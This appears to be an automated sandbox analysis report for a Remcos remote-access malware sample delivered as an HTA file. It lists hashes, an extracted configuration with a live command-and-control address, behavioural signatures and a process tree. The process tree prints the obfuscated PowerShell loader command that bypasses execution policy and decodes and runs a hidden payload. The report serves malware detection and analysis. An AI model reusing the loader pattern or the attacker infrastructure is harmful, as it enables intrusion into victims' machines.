Analysis
- max time kernel: 150s
- max time network: 149s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 17-12-2024 03:13
Behavioral task
- behavioral1
- Sample: 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta
- Resource: win7-20240708-en
General
- Target: 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta
- Size: 142KB
- MD5: 22ca9f87ffb6d9d3dc9d7e4f151470c7
- SHA1: df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
- SHA256: 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
- SHA512: e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
- SSDEEP: 768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn
Malware Config
Extracted
- Family: remcos
- elvis
- 107.173.4.16:2560
- audio_folder: MicRecords
- audio_path: ApplicationPath
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: false
- install_flag: false
- keylog_crypt: false
- keylog_file: logs.dat
- keylog_flag: false
- keylog_folder: remcos
- mouse_option: false
- mutex: Rmc-GJDISH
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures
- Remcos family
- Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  4     1948  powershell.exe
- Downloads MZ/PE file
- Evasion via Device Credential Deployment (2 IoCs)
  pid   Process
  1948  powershell.exe
  2548  cmd.exe
- Executes dropped EXE (1 IoCs)
  pid   Process
  2832  nicetomeetyousweeet.exe
- Loads dropped DLL (4 IoCs)
  pid   Process
  1948  powershell.exe
  1948  powershell.exe
  1948  powershell.exe
  1948  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                           Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
- Modifies Internet Explorer settings (1 IoCs)
  description  ioc                                                                                                  Process
  Key created  \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1948  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description             pid   Process
  Token: SeDebugPrivilege  1948  powershell.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  description                          pid   Process         procid_target
  PID 1312 wrote to memory of 2548     1312  mshta.exe       30
  PID 1312 wrote to memory of 2548     1312  mshta.exe       30
  PID 1312 wrote to memory of 2548     1312  mshta.exe       30
  PID 1312 wrote to memory of 2548     1312  mshta.exe       30
  PID 2548 wrote to memory of 1948     2548  cmd.exe         32
  PID 2548 wrote to memory of 1948     2548  cmd.exe         32
  PID 2548 wrote to memory of 1948     2548  cmd.exe         32
  PID 2548 wrote to memory of 1948     2548  cmd.exe         32
  PID 1948 wrote to memory of 2724     1948  powershell.exe  33
  PID 1948 wrote to memory of 2724     1948  powershell.exe  33
  PID 1948 wrote to memory of 2724     1948  powershell.exe  33
  PID 1948 wrote to memory of 2724     1948  powershell.exe  33
  PID 2724 wrote to memory of 2836     2724  csc.exe         34
  PID 2724 wrote to memory of 2836     2724  csc.exe         34
  PID 2724 wrote to memory of 2836     2724  csc.exe         34
  PID 2724 wrote to memory of 2836     2724  csc.exe         34
  PID 1948 wrote to memory of 2832     1948  powershell.exe  37
  PID 1948 wrote to memory of 2832     1948  powershell.exe  37
  PID 1948 wrote to memory of 2832     1948  powershell.exe  37
  PID 1948 wrote to memory of 2832     1948  powershell.exe  37
Processes
- [1] C:\Windows\SysWOW64\mshta.exe (PID:1312)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe (PID:2548)
    Command line: "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'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'+[CHaR]0x22+'))')))"
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID:1948)
      Command line: poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'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'+[CHaR]0x22+'))')))"
      - Blocklisted process makes network request
      - Evasion via Device Credential Deployment
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID:2724)
        Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9nbkubh7.cmdline"
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID:2836)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC68B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC68A.tmp"
          - System Location Discovery: System Language Discovery
      - [4] C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe (PID:2832)
        Command line: "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
        - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 8110369b4913d58f30a9030194c940a9
  SHA1: 2779cbcc810e1c9131b6719623413e94003783af
  SHA256: e52e6c7fe5ca62bbc133701402d74056bdefbfa9c1482ea208d85d239ffd5764
  SHA512: a3400402f87b690a1705d0e3e7b1415fb8cf5118be10831fdfa999f9950db9fe02c04ace316a6b05d8589f46ad9dd67df15ab4d68cc7f3fc772c5702ef7f2ba2
- Filesize: 7KB
  MD5: 623b34b0b11542173d7afacc1f245194
  SHA1: d78e417fa305d8b4c8ec34f7916dd5eabed6bca9
  SHA256: 05f3834f9bdd0125f4a88b297e66f6d005dd843bb41c816ddb5dbf682664d360
  SHA512: cd51afe2825eb936bd54b1ecf198e54c362683dc849e04186ecd4bae3dafbc88cba2d930fdf9a6dd8cb6dc4e759ec748c2dc514e181d85eee1fa8e13cc180d7f
- Filesize: 1KB
  MD5: 1d1077f4fe6effcd680e9469bc69297c
  SHA1: 243294c27f012751b2046bca693566fa6ccb7c09
  SHA256: 84dba55adb984305279022808c924e0728979d7c1b0500bfc3a5dbcb75150b67
  SHA512: 4d53c3a42e68257d6fe032e415ff4ca60257b62e467c67ca7619c78995df796ca9b6ba5301cef22d64446e22965538f1545072edb2c2b9096403d58fd0bd652a
- Filesize: 478B
  MD5: 80c03b4485808d996cc8226157f377a7
  SHA1: 7cc7e02b84232b1523c555a349c86fc059a98eff
  SHA256: 240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d
  SHA512: ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c
- Filesize: 309B
  MD5: aee07cca87aa1776ace9f469ad15a73d
  SHA1: 7d7b93792051018aea6c00d4ee17f2b4b6c5f428
  SHA256: 3d8dcbd6494604eaa16b0f77c4fd7397731a864acd73827646f66476962de650
  SHA512: 83306f22068685877104e291e1ac9fab4ae39d7159bd274b62c85f9636bf615628da7015231da1ab2d792772f36575d3a3846e89124e465755f83b2dafa9c33f
- Filesize: 652B
  MD5: 8456482394366df9e37a3d3751b53fbe
  SHA1: c4493efa4a4488f4899642f40fb5486789e4bb3a
  SHA256: 792bc9d88e1ad5d6435b2798268660563efd16203dca9579dc61fe98f7eaf3ee
  SHA512: b0c337636bfc446b7d14120e01447afdd217edc9891c7104106501156cdd4c6d31687afeaf3309a71d902d8167bfb41d85e1afbc6b44daeb720889b736c66c14
- Filesize: 530KB
  MD5: c6b0fba610732719435d9621878bc605
  SHA1: 789afce0b2016029215db7cca0ce7c4acfa54b4c
  SHA256: ce59b68d157e34b9608b9535441963aaef11068cae3b75a3646238f25b74b92d
  SHA512: 5d67d7e0fec12d7f03053d809f614263c6af7b3d54ed794632ee9024895b3c607ebcabd81a2d6202d280968c4df1ef9bd3699675416a67936345f8622c206933